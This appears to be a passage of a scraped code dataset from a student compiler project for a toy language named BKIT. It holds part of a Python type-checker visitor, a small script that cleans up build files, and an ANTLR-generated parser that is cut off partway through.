update_expr.mtype.restype\n if not isinstance(update_val, IntType):\n raise TypeMismatchInStatement(ast)\n\n scope = reduce(lambda env, x: [self.visit(x, env)] + env, ast.loop[0], [])\n cur_env = scope + env\n res_type_list = []\n for stmt in ast.loop[1]:\n try:\n typ = self.visit(stmt, cur_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n\n env = cur_env[len(scope) :]\n for res in res_type_list:\n if res:\n return res\n return None\n \n def visitBreak(self, ast, env):\n \"\"\"\n Do not care about unreachablestmt\n \"\"\"\n return None\n\n def visitReturn(self, ast, env):\n \"\"\"\n TODO: check the type of this return stmt and the type of function return\n return type has the type if None we handled in FuncDecl\n \"\"\"\n if ast.expr:\n res = self.visit(ast.expr, env)\n if res == None:\n raise Undeclared(Variable(), ast.expr.name)\n if isinstance(res.mtype, (Prim, Unknown)):\n if isinstance(res.mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n else:\n return res\n if isinstance(res.mtype, ArrayType):\n if isinstance(res.mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n else:\n return res\n if isinstance(res.mtype, MType):\n if isinstance(res.mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n else:\n return res\n else:\n return Symbol('', VoidType())\n\n def visitDowhile(self, ast, env):\n \"\"\"\n Do stmt before\n \"\"\"\n scope = reduce(lambda env, x: [self.visit(x, env)] + env, ast.sl[0], [])\n cur_env = scope + env\n\n res_type_list = []\n for stmt in ast.sl[1]:\n try:\n typ = self.visit(stmt, cur_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n\n expr = self.visit(ast.exp, env)\n expr_val = None\n if expr is None:\n raise Undeclared(Identifier(), ast.exp.name)\n if isinstance(expr.mtype, (Prim, Unknown)):\n if isinstance(expr.mtype, Unknown):\n expr.mtype = BoolType()\n expr_val = expr.mtype\n if isinstance(expr.mtype, ArrayType):\n if isinstance(expr.mtype.eletype, Unknown):\n expr.mtype.eletype = BoolType()\n expr_val = expr.mtype.eletype\n if isinstance(expr.mtype, MType):\n if isinstance(expr.mtype.restype, Unknown):\n expr.mtype.restype = BoolType()\n expr_val = expr.mtype.restype\n if not isinstance(expr_val, BoolType):\n raise TypeMismatchInStatement(ast)\n \n env = cur_env[len(scope) :]\n for res in res_type_list:\n if res:\n return res\n return None\n \n\n def visitWhile(self, ast, env):\n \"\"\"\n Same with Dowhile?\n \"\"\"\n expr = self.visit(ast.exp, env)\n expr_val = None\n if expr is None:\n raise Undeclared(Identifier(), ast.exp.name)\n if isinstance(expr.mtype, (Prim, Unknown)):\n if isinstance(expr.mtype, Unknown):\n expr.mtype = BoolType()\n expr_val = expr.mtype\n if isinstance(expr.mtype, ArrayType):\n if isinstance(expr.mtype.eletype, Unknown):\n expr.mtype.eletype = BoolType()\n expr_val = expr.mtype.eletype\n if isinstance(expr.mtype, MType):\n if isinstance(expr.mtype.restype, Unknown):\n expr.mtype.restype = BoolType()\n expr_val = expr.mtype.restype\n if not isinstance(expr_val, BoolType):\n raise TypeMismatchInStatement(ast)\n\n scope = reduce(lambda env, x: [self.visit(x, env)] + env, ast.sl[0], [])\n cur_env = scope + env\n # res_list = []\n # for stmt in ast.sl[1]:\n # try:\n # res_list += [self.visit(stmt, cur_env)]\n # except TypeCannotBeInferred:\n # raise TypeCannotBeInferred(stmt)\n \n res_type_list = []\n for stmt in ast.sl[1]:\n try:\n typ = self.visit(stmt, cur_env)\n if typ is not None:\n res_type_list += [typ]\n if type(res_type_list[0].mtype) != type(typ.mtype):\n raise TypeMismatchInStatement(stmt)\n except TypeCannotBeInferred:\n raise TypeCannotBeInferred(stmt)\n\n env = cur_env[len(scope) :]\n for res in res_type_list:\n if res:\n return res\n return None\n\n def visitCallStmt(self, ast, env):\n \"\"\"\n Callee must have the VoidType as its return type\n \"\"\"\n func = self.visit(ast.method, env)\n if func is None or not isinstance(func.mtype, MType):\n raise Undeclared(Function(), ast.method.name)\n if not func.mtype.restype:\n func.mtype.restype = VoidType()\n if not isinstance(func.mtype.restype, VoidType):\n raise TypeMismatchInStatement(ast)\n if len(func.mtype.intype) != len(ast.param):\n raise TypeMismatchInStatement(ast)\n\n # args = [self.visit(arg, env) for arg in ast.param]\n for (idx, arg) in enumerate(ast.param):\n arg_sym = self.visit(arg, env) # arg_type: Symbol\n arg_type = Unknown()\n is_arr = False\n if isinstance(arg_sym.mtype, (Prim, Unknown)):\n arg_type = arg_sym.mtype\n if isinstance(arg_sym.mtype, MType):\n arg_type = arg_sym.mtype.restype\n if isinstance(arg_sym.mtype, ArrayType):\n arg_type = arg_sym.mtype.eletype\n is_arr = True\n\n if isinstance(arg_type, Unknown):\n if func.mtype.intype[idx] == None:\n raise TypeCannotBeInferred(ast)\n if isinstance(func.mtype.intype[idx].mtype, (Unknown, Prim)):\n if isinstance(func.mtype.intype[idx].mtype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype\n if isinstance(func.mtype.intype[idx].mtype, MType):\n if isinstance(func.mtype.intype[idx].mtype.restype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype.restype\n if isinstance(func.mtype.intype[idx].mtype, ArrayType):\n if not is_arr:\n raise TypeMismatchInStatement(ast)\n if isinstance(func.mtype.intype[idx].mtype.eletype, Unknown):\n raise TypeCannotBeInferred(ast)\n arg_type = func.mtype.intype[idx].mtype.eletype\n \n else: # arg_type is known\n if func.mtype.intype[idx] == None:\n func.mtype.intype[idx] = arg_sym\n if isinstance(func.mtype.intype[idx].mtype, (Unknown,Prim)):\n if isinstance(func.mtype.intype[idx].mtype, Unknown):\n func.mtype.intype[idx].mtype = arg_type\n if type(func.mtype.intype[idx].mtype) != type(arg_type):\n raise TypeMismatchInStatement(ast)\n if isinstance(func.mtype.intype[idx].mtype, MType):\n if isinstance(func.mtype.intype[idx].mtype.restype, Unknown):\n func.mtype.intype[idx].mtype.restype = arg_type\n if type(func.mtype.intype[idx].mtype.restype) != type(arg_type):\n raise TypeMismatchInStatement(ast)\n if isinstance(func.mtype.intype[idx].mtype, ArrayType):\n if not is_arr:\n raise TypeMismatchInStatement(ast)\n if isinstance(func.mtype.intype[idx].mtype.eletype, Unknown):\n func.mtype.intype[idx].mtype.eletype = arg_type\n if type(func.mtype.intype[idx].mtype.eletype) != type(arg_type):\n raise TypeMismatchInStatement(ast)\n if type(func.mtype.intype[idx]) != type(arg_sym):\n # array type not match\n raise TypeMismatchInStatement(ast)\n \n if isinstance(arg_sym.mtype, (Prim, Unknown)):\n arg_sym.mtype = arg_type\n if isinstance(arg_sym.mtype, MType):\n arg_sym.mtype.restype = arg_type\n if isinstance(arg_sym.mtype, ArrayType):\n arg_sym.mtype.eletype = arg_type\n\n return None\n\n def visitId(self, ast, c):\n \"\"\"\n return: Symbol(name=id.name, mtype=None)\n \"\"\"\n for sym in c:\n if sym.name == ast.name:\n return sym\n return None\n\n def is_same_type(self, a, b):\n # print(a.mtype)\n # print(b.mtype)\n if type(a.mtype) != type(b.mtype):\n return False\n else:\n if isinstance(a.mtype, ArrayType):\n if len(a.mtype.dimen) != len(b.mtype.dimen) or a.mtype.eletype != b.mtype.eletype:\n return False\n if isinstance(a.mtype, MType):\n if a.mtype.intype != b.mtype.intype or a.mtype.restype != b.mtype.restype:\n return False\n return True\n \n def visitGlobal(self,ast,c):\n if isinstance(ast, FuncDecl):\n for x in c:\n if x.name == ast.name.name:\n raise Redeclared(Function(), x.name)\n return Symbol(ast.name.name, MType([None]*len(ast.param), None))\n if isinstance(ast, VarDecl):\n for x in c:\n if x.name == ast.variable.name:\n raise Redeclared(Variable(), x.name)\n return Symbol(ast.variable.name, None)\n\n def update_scope(self, scope, var):\n \"\"\"\n stack-like\n \"\"\"\n return [var] + scope\n \"\"\"\n Rang comment them de co du 1000 dong\n \"\"\"\n" }, { "alpha_fraction": 0.6451612710952759, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 19.66666603088379, "blob_id": "623dd8680b54b9d9814c4675784f6868fbc4c53e", "content_id": "0b2ea126ed2091ecc2773df0ef198e9302211bdc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 62, "license_type": "no_license", "max_line_length": 38, "num_lines": 3, "path": "/SyntaxAnalysis/clean.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "#!/bin/bash\nrm -f *.java *.interp *.tokens *.class\necho Clear\n" }, { "alpha_fraction": 0.49789363145828247, "alphanum_fraction": 0.5460183620452881, "avg_line_length": 32.23735427856445, "blob_id": "723453f0702cd2fcba117d7f93bed823ff2714f7", "content_id": "0d31739cb37a1a1b46a3264c6430f2f48bc16386", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34182, "license_type": "no_license", "max_line_length": 165, "num_lines": 1028, "path": "/SyntaxAnalysis/tut/src/forJava/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/tut/src/forJava/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\36\")\n buf.write(\"\\u008f\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\3\\2\\3\\2\\6\\2!\\n\\2\\r\\2\\16\\2\\\"\\3\\2\\3\\2\\3\")\n buf.write(\"\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\4\")\n buf.write(\"\\64\\n\\4\\f\\4\\16\\4\\67\\13\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\7\")\n buf.write(\"\\5@\\n\\5\\f\\5\\16\\5C\\13\\5\\3\\6\\3\\6\\3\\6\\5\\6H\\n\\6\\3\\7\\3\\7\\3\")\n buf.write(\"\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\b\\7\\bR\\n\\b\\f\\b\\16\\bU\\13\\b\\3\\b\\3\\b\")\n buf.write(\"\\3\\b\\3\\t\\3\\t\\3\\t\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\5\\nb\\n\\n\\3\\13\\3\\13\")\n buf.write(\"\\3\\13\\3\\13\\3\\13\\3\\13\\5\\13j\\n\\13\\3\\13\\3\\13\\3\\13\\7\\13o\\n\")\n buf.write(\"\\13\\f\\13\\16\\13r\\13\\13\\3\\f\\3\\f\\3\\f\\3\\f\\3\\f\\3\\f\\7\\fz\\n\\f\")\n buf.write(\"\\f\\f\\16\\f}\\13\\f\\3\\r\\3\\r\\3\\r\\3\\r\\5\\r\\u0083\\n\\r\\3\\16\\3\\16\")\n buf.write(\"\\3\\16\\7\\16\\u0088\\n\\16\\f\\16\\16\\16\\u008b\\13\\16\\3\\17\\3\\17\")\n buf.write(\"\\3\\17\\2\\4\\24\\26\\20\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\")\n buf.write(\"\\2\\3\\3\\2\\16\\17\\2\\u0090\\2 \\3\\2\\2\\2\\4&\\3\\2\\2\\2\\6*\\3\\2\\2\")\n buf.write(\"\\2\\bA\\3\\2\\2\\2\\nG\\3\\2\\2\\2\\fI\\3\\2\\2\\2\\16N\\3\\2\\2\\2\\20Y\\3\")\n buf.write(\"\\2\\2\\2\\22a\\3\\2\\2\\2\\24i\\3\\2\\2\\2\\26s\\3\\2\\2\\2\\30\\u0082\\3\")\n buf.write(\"\\2\\2\\2\\32\\u0084\\3\\2\\2\\2\\34\\u008c\\3\\2\\2\\2\\36!\\5\\4\\3\\2\\37\")\n buf.write(\"!\\5\\6\\4\\2 \\36\\3\\2\\2\\2 \\37\\3\\2\\2\\2!\\\"\\3\\2\\2\\2\\\" \\3\\2\\2\")\n buf.write(\"\\2\\\"#\\3\\2\\2\\2#$\\3\\2\\2\\2$%\\7\\2\\2\\3%\\3\\3\\2\\2\\2&\\'\\5\\34\\17\")\n buf.write(\"\\2\\'(\\5\\32\\16\\2()\\7\\34\\2\\2)\\5\\3\\2\\2\\2*+\\5\\34\\17\\2+,\\7\")\n buf.write(\"\\3\\2\\2,-\\7\\24\\2\\2-.\\5\\34\\17\\2.\\65\\5\\32\\16\\2/\\60\\7\\34\\2\")\n buf.write(\"\\2\\60\\61\\5\\34\\17\\2\\61\\62\\5\\32\\16\\2\\62\\64\\3\\2\\2\\2\\63/\\3\")\n buf.write(\"\\2\\2\\2\\64\\67\\3\\2\\2\\2\\65\\63\\3\\2\\2\\2\\65\\66\\3\\2\\2\\2\\668\\3\")\n buf.write(\"\\2\\2\\2\\67\\65\\3\\2\\2\\289\\7\\25\\2\\29:\\7\\30\\2\\2:;\\5\\b\\5\\2;\")\n buf.write(\"<\\7\\31\\2\\2<\\7\\3\\2\\2\\2=@\\5\\4\\3\\2>@\\5\\n\\6\\2?=\\3\\2\\2\\2?>\")\n buf.write(\"\\3\\2\\2\\2@C\\3\\2\\2\\2A?\\3\\2\\2\\2AB\\3\\2\\2\\2B\\t\\3\\2\\2\\2CA\\3\")\n buf.write(\"\\2\\2\\2DH\\5\\f\\7\\2EH\\5\\16\\b\\2FH\\5\\20\\t\\2GD\\3\\2\\2\\2GE\\3\\2\")\n buf.write(\"\\2\\2GF\\3\\2\\2\\2H\\13\\3\\2\\2\\2IJ\\7\\3\\2\\2JK\\7\\36\\2\\2KL\\5\\22\")\n buf.write(\"\\n\\2LM\\7\\34\\2\\2M\\r\\3\\2\\2\\2NO\\7\\3\\2\\2OS\\7\\24\\2\\2PR\\5\\32\")\n buf.write(\"\\16\\2QP\\3\\2\\2\\2RU\\3\\2\\2\\2SQ\\3\\2\\2\\2ST\\3\\2\\2\\2TV\\3\\2\\2\")\n buf.write(\"\\2US\\3\\2\\2\\2VW\\7\\25\\2\\2WX\\7\\34\\2\\2X\\17\\3\\2\\2\\2YZ\\7\\r\\2\")\n buf.write(\"\\2Z[\\5\\22\\n\\2[\\21\\3\\2\\2\\2\\\\]\\5\\24\\13\\2]^\\7\\20\\2\\2^_\\5\")\n buf.write(\"\\22\\n\\2_b\\3\\2\\2\\2`b\\5\\24\\13\\2a\\\\\\3\\2\\2\\2a`\\3\\2\\2\\2b\\23\")\n buf.write(\"\\3\\2\\2\\2cd\\b\\13\\1\\2de\\5\\26\\f\\2ef\\7\\21\\2\\2fg\\5\\24\\13\\5\")\n buf.write(\"gj\\3\\2\\2\\2hj\\5\\26\\f\\2ic\\3\\2\\2\\2ih\\3\\2\\2\\2jp\\3\\2\\2\\2kl\")\n buf.write(\"\\f\\4\\2\\2lm\\7\\22\\2\\2mo\\5\\26\\f\\2nk\\3\\2\\2\\2or\\3\\2\\2\\2pn\\3\")\n buf.write(\"\\2\\2\\2pq\\3\\2\\2\\2q\\25\\3\\2\\2\\2rp\\3\\2\\2\\2st\\b\\f\\1\\2tu\\5\\30\")\n buf.write(\"\\r\\2u{\\3\\2\\2\\2vw\\f\\4\\2\\2wx\\7\\23\\2\\2xz\\5\\26\\f\\5yv\\3\\2\\2\")\n buf.write(\"\\2z}\\3\\2\\2\\2{y\\3\\2\\2\\2{|\\3\\2\\2\\2|\\27\\3\\2\\2\\2}{\\3\\2\\2\\2\")\n buf.write(\"~\\u0083\\7\\n\\2\\2\\177\\u0083\\7\\13\\2\\2\\u0080\\u0083\\7\\3\\2\\2\")\n buf.write(\"\\u0081\\u0083\\5\\16\\b\\2\\u0082~\\3\\2\\2\\2\\u0082\\177\\3\\2\\2\\2\")\n buf.write(\"\\u0082\\u0080\\3\\2\\2\\2\\u0082\\u0081\\3\\2\\2\\2\\u0083\\31\\3\\2\")\n buf.write(\"\\2\\2\\u0084\\u0089\\7\\3\\2\\2\\u0085\\u0086\\7\\35\\2\\2\\u0086\\u0088\")\n buf.write(\"\\7\\3\\2\\2\\u0087\\u0085\\3\\2\\2\\2\\u0088\\u008b\\3\\2\\2\\2\\u0089\")\n buf.write(\"\\u0087\\3\\2\\2\\2\\u0089\\u008a\\3\\2\\2\\2\\u008a\\33\\3\\2\\2\\2\\u008b\")\n buf.write(\"\\u0089\\3\\2\\2\\2\\u008c\\u008d\\t\\2\\2\\2\\u008d\\35\\3\\2\\2\\2\\17\")\n buf.write(\" \\\"\\65?AGSaip{\\u0082\\u0089\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"'return'\", \n \"'int'\", \"'float'\", \"'+'\", \"'-'\", \"'*'\", \"'/'\", \"'('\", \n \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \n \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \n \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \n \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \n \"STAR_INT\", \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_function_body = 3\n RULE_stmt = 4\n RULE_assign_stmt = 5\n RULE_call_stmt = 6\n RULE_ret_stmt = 7\n RULE_expr = 8\n RULE_expr1 = 9\n RULE_expr2 = 10\n RULE_operand = 11\n RULE_ids_list = 12\n RULE_primitive_type = 13\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"function_body\", \n \"stmt\", \"assign_stmt\", \"call_stmt\", \"ret_stmt\", \"expr\", \n \"expr1\", \"expr2\", \"operand\", \"ids_list\", \"primitive_type\" ]\n\n EOF = Token.EOF\n ID=1\n ILLEGAL_ESCAPE=2\n UNCLOSE_STRING=3\n COMMENT=4\n UNTERMINATED_COMMENT=5\n ERROR_CHAR=6\n WS=7\n Integer_literal=8\n Float_literal=9\n String_literal=10\n RETURN=11\n INT=12\n FLOAT=13\n PLUS_INT=14\n MINUS_INT=15\n STAR_INT=16\n DIV_INT=17\n LEFT_PAREN=18\n RIGHT_PAREN=19\n LEFT_BRACKET=20\n RIGHT_BRACKET=21\n LEFT_BRACE=22\n RIGHT_BRACE=23\n COLON=24\n DOT=25\n SEMI=26\n COMMA=27\n ASSIGN=28\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 30 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 30\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,0,self._ctx)\n if la_ == 1:\n self.state = 28\n self.var_declare()\n pass\n\n elif la_ == 2:\n self.state = 29\n self.function_declare()\n pass\n\n\n self.state = 32 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.INT or _la==BKITParser.FLOAT):\n break\n\n self.state = 34\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self):\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,0)\n\n\n def ids_list(self):\n return self.getTypedRuleContext(BKITParser.Ids_listContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 36\n self.primitive_type()\n self.state = 37\n self.ids_list()\n self.state = 38\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def primitive_type(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_typeContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_typeContext,i)\n\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def ids_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_listContext,i)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def function_body(self):\n return self.getTypedRuleContext(BKITParser.Function_bodyContext,0)\n\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 40\n self.primitive_type()\n self.state = 41\n self.match(BKITParser.ID)\n self.state = 42\n self.match(BKITParser.LEFT_PAREN)\n self.state = 43\n self.primitive_type()\n self.state = 44\n self.ids_list()\n self.state = 51\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.SEMI:\n self.state = 45\n self.match(BKITParser.SEMI)\n self.state = 46\n self.primitive_type()\n self.state = 47\n self.ids_list()\n self.state = 53\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 54\n self.match(BKITParser.RIGHT_PAREN)\n self.state = 55\n self.match(BKITParser.LEFT_BRACE)\n self.state = 56\n self.function_body()\n self.state = 57\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_bodyContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_body\n\n\n\n\n def function_body(self):\n\n localctx = BKITParser.Function_bodyContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_function_body)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 63\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.RETURN) | (1 << BKITParser.INT) | (1 << BKITParser.FLOAT))) != 0):\n self.state = 61\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT, BKITParser.FLOAT]:\n self.state = 59\n self.var_declare()\n pass\n elif token in [BKITParser.ID, BKITParser.RETURN]:\n self.state = 60\n self.stmt()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 65\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def assign_stmt(self):\n return self.getTypedRuleContext(BKITParser.Assign_stmtContext,0)\n\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def ret_stmt(self):\n return self.getTypedRuleContext(BKITParser.Ret_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_stmt\n\n\n\n\n def stmt(self):\n\n localctx = BKITParser.StmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_stmt)\n try:\n self.state = 69\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,5,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 66\n self.assign_stmt()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 67\n self.call_stmt()\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 68\n self.ret_stmt()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Assign_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_assign_stmt\n\n\n\n\n def assign_stmt(self):\n\n localctx = BKITParser.Assign_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_assign_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 71\n self.match(BKITParser.ID)\n self.state = 72\n self.match(BKITParser.ASSIGN)\n self.state = 73\n self.expr()\n self.state = 74\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def ids_list(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Ids_listContext)\n else:\n return self.getTypedRuleContext(BKITParser.Ids_listContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n\n\n\n def 